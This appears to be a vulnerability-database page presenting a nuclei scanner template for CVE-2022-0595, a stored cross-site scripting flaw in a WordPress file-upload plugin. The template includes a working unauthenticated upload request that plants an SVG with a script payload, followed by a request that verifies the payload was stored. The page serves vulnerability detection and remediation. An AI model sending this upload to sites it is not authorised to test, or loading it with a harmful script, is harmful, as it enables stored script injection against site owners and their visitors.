Lucene search
+L

WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting

🗓️ 24 Jul 2026 06:28:33Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 99 Views

WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting vulnerability via drag and drop multiple file uploa

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-0595
28 Mar 202218:15
attackerkb
Circl
CVE-2022-0595
28 Mar 202222:42
circl
CNNVD
WordPress plugin Drag and Drop Multiple File Upload 跨站脚本漏洞
28 Mar 202200:00
cnnvd
CNVD
WordPress Drag and Drop Multiple File Upload plugin cross-site scripting vulnerability
30 Mar 202200:00
cnvd
CVE
CVE-2022-0595
28 Mar 202217:22
cve
Cvelist
CVE-2022-0595 Drag and Drop Multiple File Upload - Contact Form 7 < 1.3.6.3 - Unauthenticated Stored XSS
28 Mar 202217:22
cvelist
EUVD
EUVD-2022-15702
28 Mar 202217:22
euvd
Hacker One
Nord Security: Stored XSS at nordvpn.com
19 Jan 202323:35
hackerone
NVD
CVE-2022-0595
28 Mar 202218:15
nvd
OSV
CVE-2022-0595
28 Mar 202218:15
osv
Rows per page
id: CVE-2022-0595

info:
  name: WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting
  author: akincibor
  severity: medium
  description: |
    WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.
  remediation: |
    Update the WordPress Contact Form 7 plugin to version 1.3.6.3 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/1b849957-eaca-47ea-8f84-23a3a98cc8de
    - https://plugins.trac.wordpress.org/changeset/2686614
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-0595
    cwe-id: CWE-79
    epss-score: 0.13575
    epss-percentile: 0.96063
    cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: codedropz
    product: drag_and_drop_multiple_file_upload_-_contact_form_7
    framework: wordpress
  tags: cve,cve2022,xss,wordpress,wp-plugin,wpscan,fileupload,intrusive,unauth,codedropz,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161

        -----------------------------92633278134516118923780781161
        Content-Disposition: form-data; name="size_limit"

        10485760
        -----------------------------92633278134516118923780781161
        Content-Disposition: form-data; name="action"

        dnd_codedropz_upload
        -----------------------------92633278134516118923780781161
        Content-Disposition: form-data; name="type"

        click
        -----------------------------92633278134516118923780781161
        Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.svg"
        Content-Type: image/jpeg

        <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
        -----------------------------92633278134516118923780781161--
      - |
        GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "alert(document.domain)")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4a0a0047304502210099600e6511f0eb1fded357c85ae32632238c4c4870d3239563ed4d2643df120b022022ebb118750a1cbb52521227c823cf4d629920479b188ab27e74c776b39cb1a8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 23.5
CVSS 3.15.4
EPSS0.13575
99